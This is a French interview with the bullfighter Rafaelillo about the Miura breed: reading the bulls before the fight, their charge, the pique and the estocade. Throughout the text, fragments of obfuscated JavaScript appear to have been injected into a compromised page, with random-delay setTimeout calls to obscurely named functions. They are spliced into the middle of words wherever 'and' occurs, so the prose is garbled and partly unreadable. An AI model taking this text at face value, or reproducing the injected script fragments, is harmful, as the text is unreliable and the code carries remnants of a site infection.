ENTRETIEN AVEC RAFAELILLO

Le torero de Murcie a connu des succès importants cette année mais nous souhaitions qu’il nous parle du toro de Miura. Rafaelillo : Je demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande à mes bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilleros qu’ils prennent en photo mes toros à l’apartado. Je préfère, avant la corrida, savoir à quoi je vais être confronté. Voir leur morphologie et surtout leurs regards.

On peut se tromper, mais le toro te dit des choses par son regard. C’est une première prise de contact avec l’animal.

-Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le toro de Miura sort dans l’arène, qu’observes-tu?

-Ses réactions, sa façon de galoper, de mettre la tête, son regard. Tu dois intégrer en peu de temps tout ce que l’animal te transmet pour le mettre au profit de ta tauromachie.

-Peut-on se relâcher à la cape avec un toro de Miura ?

-C’est rare qu’il sorte noble et en baissant la tête pour le toréer comme on l’exige aujourd’hui, avec les mains basses et doucement. Normalement le toro de Miura charge avec la tête haute, te cherche et se colle à toi. Il s’agit plutôt de dominer l’animal pour lui montrer qui commandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande plutôt que de chercher l’esthétique et l’art. Il y en a certains que j’ai pu bien toréer à la cape mais en général c’est compliqué.

-Comment se comportent-ils à la pique ?

-Ils sont souvent spectaculaires, c’est un toro très dur capable d’encaisser deux ou trois piques sans être affaibli.

-Peut-on leur faire des quites ?

-C’est un toro dont la lidia doit être extrêmement calculée, il apprend vite et tout ce que tu fais avant la muleta, le moindre accroc, ira au détriment de la faena.

-Ressens-tu du plaisir quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and tu les torées ?

-J’ai toréé une quarantaine de corridas de Miura et si j’ai pris du plaisr à toréer quatre ou cinq toros de Miura, c’est déjà beaucoup. Du plaisir entre guillemets. La lidia est surtout constituée de va-et-vient pour surmonter les adversités à force de courage, d’engagement et d’ambition. C’est souvent épique. C’est comme ça avec le toro de Miura.

-Est-ce usant ?

-Pour moi c’est une satisfaction de les affronter, même si c’est très dur. Des fois je reviens chez moi sans avoir pu donner une seule passe, sans la moindre option de pouvoir toréer. Mais quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and tu triomphes, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and tu leur coupes les oreilles, c’est vraiment mérité.

-Faut-il une technique spéciale pour l’estocade ?

-C’est un toro qui par sa morphogie et son comportement ne baisse pas la tête, ne te laisse pas passer et s’il le fait te balance des coups de tête. Je me place un peu plus près que pour les autres toros et j’attends l’instant précis où il humilie, juste un peu,  pour m’élancer, mettre le bras, l’épée le plus vite possible.

-Est-ce le plus dur des élevages ?

-Oui, de loin, de loin. C’est le toro le plus imprévisible, le plus changeant au cours de la lidia. D’une corne à l’autre mais aussi d’une passe à l’autre. Se puede uno equivocar, pero el toro te dice muchas cosas con la mirada.

fotos bruno LASNIER

AI5R3871

AI5R7749

AI5R7971

AI5R7976

Les commentaires sont fermés.